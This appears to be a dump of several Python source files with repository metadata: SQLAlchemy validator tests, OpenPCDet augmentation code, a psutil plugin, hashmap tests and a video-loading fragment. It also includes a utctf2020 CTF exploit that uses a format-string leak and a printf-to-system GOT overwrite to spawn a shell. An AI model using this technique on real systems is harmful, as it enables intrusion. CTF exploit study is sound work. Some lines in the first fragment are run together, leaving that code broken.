frame = cv2.copyMakeBorder(
frame, add_y_down, add_y_up, 0, 0, cv2.BORDER_CONSTANT, value=0
)
return frame
def load_and_resize_video(path, resize=(224, 224), resize_type="crop"):
cap = cv2.VideoCapture(path)
frames = []
try:
while True:
ret, frame = cap.read() if not ret:
break
if resize_type == "crop":
frame = crop_center_square(frame)
elif resize_type == "pad":
frame = pad_to_square(frame)
else:
return ValueError("Invalid resize_type: " + resize_type)
frame = cv2.resize(frame, resize)
frame = frame[:, :, [2, 1, 0]] frames.append(frame)
finally:
cap.release()
return np.array(frames).astype("float32") / 255.0
def resample_video(video: np.array, num_frames: int) -> np.array:
current_num_frames = video.shape[1]
indices = [(current_num_frames * i) // num_frames for i in range(num_frames)]
return video[:, indices, :, :, :]
def video_acceptable(video_np, min_num_frames_acceptable: int = 128) -> bool:
num_frames = video_np.shape[1]
if num_frames < min_num_frames_acceptable:
video_path_no_dir = pathlib.Path(video_path).name
print(f"Skipping video {video_path_no_dir}, too few frames: {num_frames}")
return False
return True
def to_gif(images):
converted_images = np.clip(images * 255, 0, 255).astype(np.uint8)
imageio.mimsave("./animation.gif", converted_images, fps=25)
return embed.embed_file("./animation.gif")
| true
| true
|
1c491e75f6745580f6f9854e23a8cb08a7146e21
| 15,242
|
py
|
Python
|
test/orm/test_validators.py
|
ricardogferreira/sqlalchemy
|
fec2b6560c14bb28ee7fc9d21028844acf700b04
|
[
"MIT"
] | 5,383
|
2018-11-27T07:34:03.000Z
|
2022-03-31T19:40:59.000Z
|
test/orm/test_validators.py
|
ricardogferreira/sqlalchemy
|
fec2b6560c14bb28ee7fc9d21028844acf700b04
|
[
"MIT"
] | 2,719
|
2018-11-27T07:55:01.000Z
|
2022-03-31T22:09:44.000Z
|
test/orm/test_validators.py
|
ricardogferreira/sqlalchemy
|
fec2b6560c14bb28ee7fc9d21028844acf700b04
|
[
"MIT"
] | 1,056
|
2015-01-03T00:30:17.000Z
|
2022-03-15T12:56:24.000Z
|
from sqlalchemy import exc
from sqlalchemy.orm import collections
from sqlalchemy.orm import relationship
from sqlalchemy.orm import validates
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import ne_
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from test.orm import _fixtures
class ValidatorTest(_fixtures.FixtureTest):
def test_scalar(self):
users = self.tables.users
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("name")
def validate_name(self, key, name):
canary(key, name)
ne_(name, "fred")
return name + " modified"
self.mapper_registry.map_imperatively(User, users)
sess = fixture_session()
u1 = User(name="ed")
eq_(u1.name, "ed modified")
assert_raises(AssertionError, setattr, u1, "name", "fred")
eq_(u1.name, "ed modified")
eq_(canary.mock_calls, [call("name", "ed"), call("name", "fred")])
sess.add(u1)
sess.commit()
eq_(
sess.query(User).filter_by(name="ed modified").one(),
User(name="ed"),
)
def test_collection(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("addresses")
def validate_address(self, key, ad):
canary(key, ad)
assert "@" in ad.email_address
return ad
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
sess = fixture_session()
u1 = User(name="edward")
a0 = Address(email_address="noemail")
assert_raises(AssertionError, u1.addresses.append, a0)
a1 = Address(id=15, email_address="foo@bar.com")
u1.addresses.append(a1)
eq_(canary.mock_calls, [call("addresses", a0), call("addresses", a1)])
sess.add(u1)
sess.commit()
eq_(
sess.query(User).filter_by(name="edward").one(),
User(
name="edward", addresses=[Address(email_address="foo@bar.com")]
),
)
def test_validators_dict(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("name")
def validate_name(self, key, name):
ne_(name, "fred")
return name + " modified"
@validates("addresses")
def validate_address(self, key, ad):
assert "@" in ad.email_address
return ad
def simple_function(self, key, value):
return key, value
u_m = self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
eq_(
dict((k, v[0].__name__) for k, v in list(u_m.validators.items())),
{"name": "validate_name", "addresses": "validate_address"},
)
def test_validator_w_removes(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("name", include_removes=True)
def validate_name(self, key, item, remove):
canary(key, item, remove)
return item
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
canary(key, item, remove)
return item
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.name = "ed"
u1.name = "mary"
del u1.name
a1, a2, a3 = Address(), Address(), Address()
u1.addresses.append(a1)
u1.addresses.remove(a1)
u1.addresses = [a1, a2]
u1.addresses = [a2, a3]
eq_(
canary.mock_calls,
[
call("name", "ed", False),
call("name", "mary", False),
call("name", "mary", True),
# append a1
call("addresses", a1, False),
# remove a1
call("addresses", a1, True),
# set to [a1, a2] - this is two appends
call("addresses", a1, False),
call("addresses", a2, False),
# set to [a2, a3] - this is a remove of a1,
# append of a3. the appends are first.
# in 1.2 due to #3896, we also get 'a2' in the
# validates as it is part of the set
call("addresses", a2, False),
call("addresses", a3, False),
call("addresses", a1, True),
],
)
def test_validator_bulk_collection_set(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
if not remove:
assert isinstance(item, str)
else:
assert isinstance(item, Address)
item = Address(email_address=item)
return item
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.addresses.append("e1")
u1.addresses.append("e2")
eq_(
u1.addresses,
[Address(email_address="e1"), Address(email_address="e2")],
)
u1.addresses = ["e3", "e4"]
eq_(
u1.addresses,
[Address(email_address="e3"), Address(email_address="e4")],
)
def test_validator_bulk_dict_set(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
if not remove:
assert isinstance(item, str)
else:
assert isinstance(item, Address)
item = Address(email_address=item)
return item
self.mapper_registry.map_imperatively(
User,
users,
properties={
"addresses": relationship(
Address,
collection_class=collections.attribute_mapped_collection(
"email_address"
),
)
},
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.addresses["e1"] = "e1"
u1.addresses["e2"] = "e2"
eq_(
u1.addresses,
{
"e1": Address(email_address="e1"),
"e2": Address(email_address="e2"),
},
)
u1.addresses = {"e3": "e3", "e4": "e4"}
eq_(
u1.addresses,
{
"e3": Address(email_address="e3"),
"e4": Address(email_address="e4"),
},
)
def test_validator_as_callable_object(self):
"""test #6538"""
users = self.tables.users
canary = Mock()
class SomeValidator(object):
def __call__(self, obj, key, name):
canary(key, name)
ne_(name, "fred")
return name + " modified"
class User(fixtures.ComparableEntity):
sv = validates("name")(SomeValidator())
self.mapper_registry.map_imperatively(User, users)
u1 = User(name="ed")
eq_(u1.name, "ed modified")
def test_validator_multi_warning(self):
users = self.tables.users
class Foo(object):
@validates("name")
def validate_one(self, key, value):
pass
@validates("name")
def validate_two(self, key, value):
pass
assert_raises_message(
exc.InvalidRequestError,
"A validation function for mapped attribute "
"'name' on mapper Mapper|Foo|users already exists",
self.mapper_registry.map_imperatively,
Foo,
users,
)
class Bar(object):
@validates("id")
def validate_three(self, key, value):
return value + 10
@validates("id", "name")
def validate_four(self, key, value):
return value + "foo"
assert_raises_message(
exc.InvalidRequestError,
"A validation function for mapped attribute "
"'name' on mapper Mapper|Bar|users already exists",
self.mapper_registry.map_imperatively,
Bar,
users,
)
def test_validator_wo_backrefs_wo_removes(self):
self._test_validator_backrefs(False, False)
def test_validator_wo_backrefs_w_removes(self):
self._test_validator_backrefs(False, True)
def test_validator_w_backrefs_wo_removes(self):
self._test_validator_backrefs(True, False)
def test_validator_w_backrefs_w_removes(self):
self._test_validator_backrefs(True, True)
def _test_validator_backrefs(self, include_backrefs, include_removes):
users, addresses = (self.tables.users, self.tables.addresses)
canary = Mock()
class User(fixtures.ComparableEntity):
if include_removes:
@validates(
"addresses",
include_removes=True,
include_backrefs=include_backrefs,
)
def validate_address(self, key, item, remove):
canary(key, item, remove)
return item
else:
@validates(
"addresses",
include_removes=False,
include_backrefs=include_backrefs,
)
def validate_address(self, key, item):
canary(key, item)
return item
class Address(fixtures.ComparableEntity):
if include_removes:
@validates(
"user",
include_backrefs=include_backrefs,
include_removes=True,
)
def validate_user(self, key, item, remove):
canary(key, item, remove)
return item
else:
@validates("user", include_backrefs=include_backrefs)
def validate_user(self, key, item):
canary(key, item)
return item
self.mapper_registry.map_imperatively(
User,
users,
properties={"addresses": relationship(Address, backref="user")},
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u2 = User()
a1, a2 = Address(), Address()
# 3 append/set, two removes
u1.addresses.append(a1)
u1.addresses.append(a2)
a2.user = u2
del a1.user
u2.addresses.remove(a2)
# copy, so that generation of the
# comparisons don't get caught
calls = list(canary.mock_calls)
if include_backrefs:
if include_removes:
eq_(
calls,
[
# append #1
call("addresses", Address(), False),
# backref for append
call("user", User(addresses=[]), False),
# append #2
call("addresses", Address(user=None), False),
# backref for append
call("user", User(addresses=[]), False),
# assign a2.user = u2
call("user", User(addresses=[]), False),
# backref for u1.addresses.remove(a2)
call("addresses", Address(user=None), True),
# backref for u2.addresses.append(a2)
call("addresses", Address(user=None), False),
# del a1.user
call("user", User(addresses=[]), True),
# backref for u1.addresses.remove(a1)
call("addresses", Address(), True),
# u2.addresses.remove(a2)
call("addresses", Address(user=None), True),
# backref for a2.user = None
call("user", None, False),
],
)
else:
eq_(
calls,
[
call("addresses", Address()),
call("user", User(addresses=[])),
call("addresses", Address(user=None)),
call("user", User(addresses=[])),
call("user", User(addresses=[])),
call("addresses", Address(user=None)),
call("user", None),
],
)
else:
if include_removes:
eq_(
calls,
[
call("addresses", Address(), False),
call("addresses", Address(user=None), False),
call("user", User(addresses=[]), False),
call("user", User(addresses=[]), True),
call("addresses", Address(user=None), True),
],
)
else:
eq_(
calls,
[
call("addresses", Address()),
call("addresses", Address(user=None)),
call("user", User(addresses=[])),
],
)
| 33.498901
| 79
| 0.50328
|
from sqlalchemy import exc
from sqlalchemy.orm import collections
from sqlalchemy.orm import relationship
from sqlalchemy.orm import validates
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import ne_
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from test.orm import _fixtures
class ValidatorTest(_fixtures.FixtureTest):
def test_scalar(self):
users = self.tables.users
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("name")
def validate_name(self, key, name):
canary(key, name)
ne_(name, "fred")
return name + " modified"
self.mapper_registry.map_imperatively(User, users)
sess = fixture_session()
u1 = User(name="ed")
eq_(u1.name, "ed modified")
assert_raises(AssertionError, setattr, u1, "name", "fred")
eq_(u1.name, "ed modified")
eq_(canary.mock_calls, [call("name", "ed"), call("name", "fred")])
sess.add(u1)
sess.commit()
eq_(
sess.query(User).filter_by(name="ed modified").one(),
User(name="ed"),
)
def test_collection(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("addresses")
def validate_address(self, key, ad):
canary(key, ad)
assert "@" in ad.email_address
return ad
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
sess = fixture_session()
u1 = User(name="edward")
a0 = Address(email_address="noemail")
assert_raises(AssertionError, u1.addresses.append, a0)
a1 = Address(id=15, email_address="foo@bar.com")
u1.addresses.append(a1)
eq_(canary.mock_calls, [call("addresses", a0), call("addresses", a1)])
sess.add(u1)
sess.commit()
eq_(
sess.query(User).filter_by(name="edward").one(),
User(
name="edward", addresses=[Address(email_address="foo@bar.com")]
),
)
def test_validators_dict(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("name")
def validate_name(self, key, name):
ne_(name, "fred")
return name + " modified"
@validates("addresses")
def validate_address(self, key, ad):
assert "@" in ad.email_address
return ad
def simple_function(self, key, value):
return key, value
u_m = self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
eq_(
dict((k, v[0].__name__) for k, v in list(u_m.validators.items())),
{"name": "validate_name", "addresses": "validate_address"},
)
def test_validator_w_removes(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
canary = Mock()
class User(fixtures.ComparableEntity):
@validates("name", include_removes=True)
def validate_name(self, key, item, remove):
canary(key, item, remove)
return item
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
canary(key, item, remove)
return item
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.name = "ed"
u1.name = "mary"
del u1.name
a1, a2, a3 = Address(), Address(), Address()
u1.addresses.append(a1)
u1.addresses.remove(a1)
u1.addresses = [a1, a2]
u1.addresses = [a2, a3]
eq_(
canary.mock_calls,
[
call("name", "ed", False),
call("name", "mary", False),
call("name", "mary", True),
call("addresses", a1, False),
call("addresses", a1, True),
call("addresses", a1, False),
call("addresses", a2, False),
call("addresses", a2, False),
call("addresses", a3, False),
call("addresses", a1, True),
],
)
def test_validator_bulk_collection_set(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
if not remove:
assert isinstance(item, str)
else:
assert isinstance(item, Address)
item = Address(email_address=item)
return item
self.mapper_registry.map_imperatively(
User, users, properties={"addresses": relationship(Address)}
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.addresses.append("e1")
u1.addresses.append("e2")
eq_(
u1.addresses,
[Address(email_address="e1"), Address(email_address="e2")],
)
u1.addresses = ["e3", "e4"]
eq_(
u1.addresses,
[Address(email_address="e3"), Address(email_address="e4")],
)
def test_validator_bulk_dict_set(self):
users, addresses, Address = (
self.tables.users,
self.tables.addresses,
self.classes.Address,
)
class User(fixtures.ComparableEntity):
@validates("addresses", include_removes=True)
def validate_address(self, key, item, remove):
if not remove:
assert isinstance(item, str)
else:
assert isinstance(item, Address)
item = Address(email_address=item)
return item
self.mapper_registry.map_imperatively(
User,
users,
properties={
"addresses": relationship(
Address,
collection_class=collections.attribute_mapped_collection(
"email_address"
),
)
},
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u1.addresses["e1"] = "e1"
u1.addresses["e2"] = "e2"
eq_(
u1.addresses,
{
"e1": Address(email_address="e1"),
"e2": Address(email_address="e2"),
},
)
u1.addresses = {"e3": "e3", "e4": "e4"}
eq_(
u1.addresses,
{
"e3": Address(email_address="e3"),
"e4": Address(email_address="e4"),
},
)
def test_validator_as_callable_object(self):
users = self.tables.users
canary = Mock()
class SomeValidator(object):
def __call__(self, obj, key, name):
canary(key, name)
ne_(name, "fred")
return name + " modified"
class User(fixtures.ComparableEntity):
sv = validates("name")(SomeValidator())
self.mapper_registry.map_imperatively(User, users)
u1 = User(name="ed")
eq_(u1.name, "ed modified")
def test_validator_multi_warning(self):
users = self.tables.users
class Foo(object):
@validates("name")
def validate_one(self, key, value):
pass
@validates("name")
def validate_two(self, key, value):
pass
assert_raises_message(
exc.InvalidRequestError,
"A validation function for mapped attribute "
"'name' on mapper Mapper|Foo|users already exists",
self.mapper_registry.map_imperatively,
Foo,
users,
)
class Bar(object):
@validates("id")
def validate_three(self, key, value):
return value + 10
@validates("id", "name")
def validate_four(self, key, value):
return value + "foo"
assert_raises_message(
exc.InvalidRequestError,
"A validation function for mapped attribute "
"'name' on mapper Mapper|Bar|users already exists",
self.mapper_registry.map_imperatively,
Bar,
users,
)
def test_validator_wo_backrefs_wo_removes(self):
self._test_validator_backrefs(False, False)
def test_validator_wo_backrefs_w_removes(self):
self._test_validator_backrefs(False, True)
def test_validator_w_backrefs_wo_removes(self):
self._test_validator_backrefs(True, False)
def test_validator_w_backrefs_w_removes(self):
self._test_validator_backrefs(True, True)
def _test_validator_backrefs(self, include_backrefs, include_removes):
users, addresses = (self.tables.users, self.tables.addresses)
canary = Mock()
class User(fixtures.ComparableEntity):
if include_removes:
@validates(
"addresses",
include_removes=True,
include_backrefs=include_backrefs,
)
def validate_address(self, key, item, remove):
canary(key, item, remove)
return item
else:
@validates(
"addresses",
include_removes=False,
include_backrefs=include_backrefs,
)
def validate_address(self, key, item):
canary(key, item)
return item
class Address(fixtures.ComparableEntity):
if include_removes:
@validates(
"user",
include_backrefs=include_backrefs,
include_removes=True,
)
def validate_user(self, key, item, remove):
canary(key, item, remove)
return item
else:
@validates("user", include_backrefs=include_backrefs)
def validate_user(self, key, item):
canary(key, item)
return item
self.mapper_registry.map_imperatively(
User,
users,
properties={"addresses": relationship(Address, backref="user")},
)
self.mapper_registry.map_imperatively(Address, addresses)
u1 = User()
u2 = User()
a1, a2 = Address(), Address()
u1.addresses.append(a1)
u1.addresses.append(a2)
a2.user = u2
del a1.user
u2.addresses.remove(a2)
calls = list(canary.mock_calls)
if include_backrefs:
if include_removes:
eq_(
calls,
[
# append #1
call("addresses", Address(), False),
# backref for append
call("user", User(addresses=[]), False),
# append #2
call("addresses", Address(user=None), False),
# backref for append
call("user", User(addresses=[]), False),
# assign a2.user = u2
call("user", User(addresses=[]), False),
# backref for u1.addresses.remove(a2)
call("addresses", Address(user=None), True),
# backref for u2.addresses.append(a2)
call("addresses", Address(user=None), False),
# del a1.user
call("user", User(addresses=[]), True),
# backref for u1.addresses.remove(a1)
call("addresses", Address(), True),
# u2.addresses.remove(a2)
call("addresses", Address(user=None), True),
# backref for a2.user = None
call("user", None, False),
],
)
else:
eq_(
calls,
[
call("addresses", Address()),
call("user", User(addresses=[])),
call("addresses", Address(user=None)),
call("user", User(addresses=[])),
call("user", User(addresses=[])),
call("addresses", Address(user=None)),
call("user", None),
],
)
else:
if include_removes:
eq_(
calls,
[
call("addresses", Address(), False),
call("addresses", Address(user=None), False),
call("user", User(addresses=[]), False),
call("user", User(addresses=[]), True),
call("addresses", Address(user=None), True),
],
)
else:
eq_(
calls,
[
call("addresses", Address()),
call("addresses", Address(user=None)),
call("user", User(addresses=[])),
],
)
| true
| true
|
1c491ed6f81ab3f1238484940ba63ee8a71c9b5d
| 180
|
py
|
Python
|
application/prophasis_agent/prophasis_agent/plugin_repo/memory_usage/memory_usage.py
|
camerongray1515/temp
|
80639026992172166b7992b209f1694ca792d2df
|
[
"BSD-2-Clause"
] | 1
|
2016-05-14T19:58:17.000Z
|
2016-05-14T19:58:17.000Z
|
application/prophasis_agent/prophasis_agent/plugin_repo/memory_usage/memory_usage.py
|
camerongray1515/temp
|
80639026992172166b7992b209f1694ca792d2df
|
[
"BSD-2-Clause"
] | 62
|
2016-05-24T19:43:45.000Z
|
2016-05-25T15:16:34.000Z
|
application/prophasis_agent/prophasis_agent/plugin_repo/memory_usage/memory_usage.py
|
camerongray1515/temp
|
80639026992172166b7992b209f1694ca792d2df
|
[
"BSD-2-Clause"
] | 1
|
2019-10-17T16:06:55.000Z
|
2019-10-17T16:06:55.000Z
|
import psutil
from plugin import PluginInterface, PluginResult
class Plugin(PluginInterface):
def get_data(self):
return PluginResult(psutil.virtual_memory().percent)
| 25.714286
| 60
| 0.783333
|
import psutil
from plugin import PluginInterface, PluginResult
class Plugin(PluginInterface):
def get_data(self):
return PluginResult(psutil.virtual_memory().percent)
| true
| true
|
1c491edab6995691581b78f5c7a45713e71bc4ed
| 2,345
|
py
|
Python
|
pcdet/datasets/augmentor/augmentor_utils.py
|
Gltina/OpenPCDet
|
e32dc7f8f903a3f0e1c93effc68d74dbe16766e2
|
[
"Apache-2.0"
] | 205
|
2021-03-23T20:17:42.000Z
|
2022-03-30T14:32:41.000Z
|
pcdet/datasets/augmentor/augmentor_utils.py
|
Gltina/OpenPCDet
|
e32dc7f8f903a3f0e1c93effc68d74dbe16766e2
|
[
"Apache-2.0"
] | 83
|
2021-03-24T05:22:28.000Z
|
2022-03-28T13:44:09.000Z
|
pcdet/datasets/augmentor/augmentor_utils.py
|
Gltina/OpenPCDet
|
e32dc7f8f903a3f0e1c93effc68d74dbe16766e2
|
[
"Apache-2.0"
] | 38
|
2021-03-25T08:52:34.000Z
|
2022-03-30T14:37:40.000Z
|
import numpy as np
from ...utils import common_utils
def random_flip_along_x(gt_boxes, points):
"""
Args:
gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
points: (M, 3 + C)
Returns:
"""
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 1] = -gt_boxes[:, 1]
gt_boxes[:, 6] = -gt_boxes[:, 6]
points[:, 1] = -points[:, 1]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 8] = -gt_boxes[:, 8]
return gt_boxes, points
def random_flip_along_y(gt_boxes, points):
"""
Args:
gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
points: (M, 3 + C)
Returns:
"""
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 0] = -gt_boxes[:, 0]
gt_boxes[:, 6] = -(gt_boxes[:, 6] + np.pi)
points[:, 0] = -points[:, 0]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7] = -gt_boxes[:, 7]
return gt_boxes, points
def global_rotation(gt_boxes, points, rot_range):
"""
Args:
gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
points: (M, 3 + C),
rot_range: [min, max]
Returns:
"""
noise_rotation = np.random.uniform(rot_range[0], rot_range[1])
points = common_utils.rotate_points_along_z(points[np.newaxis, :, :], np.array([noise_rotation]))[0]
gt_boxes[:, 0:3] = common_utils.rotate_points_along_z(gt_boxes[np.newaxis, :, 0:3], np.array([noise_rotation]))[0]
gt_boxes[:, 6] += noise_rotation
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7:9] = common_utils.rotate_points_along_z(
np.hstack((gt_boxes[:, 7:9], np.zeros((gt_boxes.shape[0], 1))))[np.newaxis, :, :],
np.array([noise_rotation])
)[0][:, 0:2]
return gt_boxes, points
def global_scaling(gt_boxes, points, scale_range):
"""
Args:
gt_boxes: (N, 7), [x, y, z, dx, dy, dz, heading]
points: (M, 3 + C),
scale_range: [min, max]
Returns:
"""
if scale_range[1] - scale_range[0] < 1e-3:
return gt_boxes, points
noise_scale = np.random.uniform(scale_range[0], scale_range[1])
points[:, :3] *= noise_scale
gt_boxes[:, :6] *= noise_scale
return gt_boxes, points
| 29.683544
| 118
| 0.550959
|
import numpy as np
from ...utils import common_utils
def random_flip_along_x(gt_boxes, points):
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 1] = -gt_boxes[:, 1]
gt_boxes[:, 6] = -gt_boxes[:, 6]
points[:, 1] = -points[:, 1]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 8] = -gt_boxes[:, 8]
return gt_boxes, points
def random_flip_along_y(gt_boxes, points):
enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
if enable:
gt_boxes[:, 0] = -gt_boxes[:, 0]
gt_boxes[:, 6] = -(gt_boxes[:, 6] + np.pi)
points[:, 0] = -points[:, 0]
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7] = -gt_boxes[:, 7]
return gt_boxes, points
def global_rotation(gt_boxes, points, rot_range):
noise_rotation = np.random.uniform(rot_range[0], rot_range[1])
points = common_utils.rotate_points_along_z(points[np.newaxis, :, :], np.array([noise_rotation]))[0]
gt_boxes[:, 0:3] = common_utils.rotate_points_along_z(gt_boxes[np.newaxis, :, 0:3], np.array([noise_rotation]))[0]
gt_boxes[:, 6] += noise_rotation
if gt_boxes.shape[1] > 7:
gt_boxes[:, 7:9] = common_utils.rotate_points_along_z(
np.hstack((gt_boxes[:, 7:9], np.zeros((gt_boxes.shape[0], 1))))[np.newaxis, :, :],
np.array([noise_rotation])
)[0][:, 0:2]
return gt_boxes, points
def global_scaling(gt_boxes, points, scale_range):
if scale_range[1] - scale_range[0] < 1e-3:
return gt_boxes, points
noise_scale = np.random.uniform(scale_range[0], scale_range[1])
points[:, :3] *= noise_scale
gt_boxes[:, :6] *= noise_scale
return gt_boxes, points
| true
| true
|
1c491f2fa9db695df7ef78843cf977a3619822a0
| 835
|
py
|
Python
|
utctf2020/zurk/exploit.py
|
nhtri2003gmail/ctf-write-ups
|
7e969c47027c39b614e10739ae3a953eed17dfa3
|
[
"MIT"
] | 101
|
2020-03-09T17:40:47.000Z
|
2022-03-31T23:26:55.000Z
|
utctf2020/zurk/exploit.py
|
nhtri2003gmail/ctf-write-ups
|
7e969c47027c39b614e10739ae3a953eed17dfa3
|
[
"MIT"
] | 1
|
2021-11-09T13:39:40.000Z
|
2021-11-10T19:15:04.000Z
|
utctf2020/zurk/exploit.py
|
datajerk/ctf-write-ups
|
1bc4ecc63a59de7d924c7214b1ce467801792da0
|
[
"MIT"
] | 31
|
2020-05-27T12:29:50.000Z
|
2022-03-31T23:23:32.000Z
|
#!/usr/bin/env python
from pwn import *
libc = ELF('libc-2.23.so')
#p = process('./zurk')
p = remote('binary.utctf.live',9003)
p.recvuntil('to do?')
p.sendline('%7$p')
_IO_2_1_stdout_ = int(p.recvuntil('to do?').split()[0],0)
_IO_2_1_stdout_offset = libc.symbols['_IO_2_1_stdout_']
base = _IO_2_1_stdout_ - _IO_2_1_stdout_offset
zurk=ELF('zurk')
_printf = zurk.got['printf']
__libc_system = libc.symbols['system']
address = base + __libc_system
words=[ address & 0xFFFF, (address >> 16) & 0xFFFF ]
assert(words[0] < words[1])
payload = ""
payload += "%" + str(words[0]).rjust(6,'0') + "x"
payload += "%0010$hn"
payload += "%" + str(words[1]-words[0]).rjust(6,'0') + "x"
payload += "%0011$hn"
payload += p64(_printf)
payload += p64(_printf + 2)
p.sendline(payload)
p.recvuntil('to do?')
p.sendline('/bin/sh')
p.interactive()
| 21.410256
| 58
| 0.65509
|
from pwn import *
libc = ELF('libc-2.23.so')
p = remote('binary.utctf.live',9003)
p.recvuntil('to do?')
p.sendline('%7$p')
_IO_2_1_stdout_ = int(p.recvuntil('to do?').split()[0],0)
_IO_2_1_stdout_offset = libc.symbols['_IO_2_1_stdout_']
base = _IO_2_1_stdout_ - _IO_2_1_stdout_offset
zurk=ELF('zurk')
_printf = zurk.got['printf']
__libc_system = libc.symbols['system']
address = base + __libc_system
words=[ address & 0xFFFF, (address >> 16) & 0xFFFF ]
assert(words[0] < words[1])
payload = ""
payload += "%" + str(words[0]).rjust(6,'0') + "x"
payload += "%0010$hn"
payload += "%" + str(words[1]-words[0]).rjust(6,'0') + "x"
payload += "%0011$hn"
payload += p64(_printf)
payload += p64(_printf + 2)
p.sendline(payload)
p.recvuntil('to do?')
p.sendline('/bin/sh')
p.interactive()
| true
| true
|
1c491fcff19cab06a1d0d644a25667157e9d40d8
| 1,446
|
py
|
Python
|
python/hashmap_repeated_word/tests/test_hashmap_repeated_word.py
|
mohmmadnoorjebreen/data-structures-and-algorithms
|
ab69cd9dc48e8508947a6f3f316cb44a96c99c42
|
[
"MIT"
] | null | null | null |
python/hashmap_repeated_word/tests/test_hashmap_repeated_word.py
|
mohmmadnoorjebreen/data-structures-and-algorithms
|
ab69cd9dc48e8508947a6f3f316cb44a96c99c42
|
[
"MIT"
] | 18
|
2021-07-29T19:52:28.000Z
|
2021-09-11T11:22:43.000Z
|
python/hashmap_repeated_word/tests/test_hashmap_repeated_word.py
|
mohmmadnoorjebreen/data-structures-and-algorithms
|
ab69cd9dc48e8508947a6f3f316cb44a96c99c42
|
[
"MIT"
] | null | null | null |
from hashmap_repeated_word import __version__
from hashmap_repeated_word.hashmap import HashTable
def test_version():
assert __version__ == '0.1.0'
def test_hashmap_repeated_word_1():
hash = HashTable()
str="Once upon a time, there was a brave princess who..."
excepted = 'a'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
def test_hashmap_repeated_word_2():
hash = HashTable()
str="It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness, it was the epoch of belief, it was the epoch of incredulity, it was the season of Light, it was the season of Darkness, it was the spring of hope, it was the winter of despair, we had everything before us, we had nothing before us, we were all going direct to Heaven, we were all going direct the other way – in short, the period was so far like the present period, that some of its noisiest authorities insisted on its being received, for good or for evil, in the superlative degree of comparison only..."
excepted = 'it'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
def test_hashmap_repeated_word_3():
hash = HashTable()
str="It was a queer, sultry summer, the summer they electrocuted the Rosenbergs, and I didn’t know what I was doing in New York..."
excepted = 'summer'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
| 51.642857
| 625
| 0.739281
|
from hashmap_repeated_word import __version__
from hashmap_repeated_word.hashmap import HashTable
def test_version():
assert __version__ == '0.1.0'
def test_hashmap_repeated_word_1():
hash = HashTable()
str="Once upon a time, there was a brave princess who..."
excepted = 'a'
